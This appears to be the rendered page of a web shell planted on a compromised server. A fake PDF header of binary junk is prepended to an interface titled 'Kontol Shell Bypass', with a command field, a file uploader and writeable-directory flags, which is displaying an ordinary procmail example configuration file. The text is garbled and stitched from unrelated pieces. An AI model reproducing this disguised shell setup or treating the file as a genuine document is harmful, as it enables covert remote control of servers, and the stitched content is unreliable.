%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /usr/share/doc/procmail/examples/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //usr/share/doc/procmail/examples/2procmailrc
# Please check if all the paths in PATH are reachable, remove the ones that
# are not.

PATH=$HOME/bin:/usr/bin:/usr/ucb:/bin:/usr/local/bin:.
MAILDIR=$HOME/Mail	# You'd better make sure it exists
DEFAULT=$MAILDIR/mbox
			# We don't use a global lockfile here now.
			# Instead we use local lockfiles everywhere.
			# This allows mail to arrive in all mailboxes
			# concurrently, or allows you to read one mailbox
			# while mail arrives in another.

# The next recipe will split up Digests into their individual messages.
# Don't do this if you use a global lockfile before this recipe (deadlock)

:0
* ^Subject:.*Digest
|formail +1 -d -s procmail

LOGFILE=$MAILDIR/from		# Put it here, in order to avoid logging
				# the arrival of the digest.

# An alternative and probably more efficient solution to splitting up a digest
# would be (only works for standard format mailbox files though):

:0:
* ^Subject:.*Other Digest
|formail +1 -ds cat >>this_lists_mailbox

# Notice the double : in the next recipe, this will cause a lockfile
# named "$MAILDIR/todd.lock" to be used if and only if this mail is going
# into the file "todd".

:0:				# Anything from thf
* ^From.*thf@somewhere.someplace
todd				# will go to $MAILDIR/todd


# The next recipe will likewise use $MAILDIR/uunetbox.lock as a lock file.

:0:				# Anything from people at uunet
* ^From.*@uunet
uunetbox			# will go to $MAILDIR/uunetbox


# And here the lockfile will be $MAILDIR/henries.lock of course.

:0:				# Anything from Henry
* ^From.*henry
henries				# will go to $MAILDIR/henries


# But you can specify any lockfile you want, like "myfile".  The following
# recipe will use "$MAILDIR/myfile" as the lock file.

:0:myfile			# All 'questions' will go to
* ^Subject:.*questions
toread				# $MAILDIR/toread

# Anything that has not been delivered by now will go to $DEFAULT

# After procmail sees the end of the rcfile, it pretends that it sees a
# LOCKFILE=$DEFAULT$LOCKEXT
# Therefore $DEFAULT is always locked.

Kontol Shell Bypass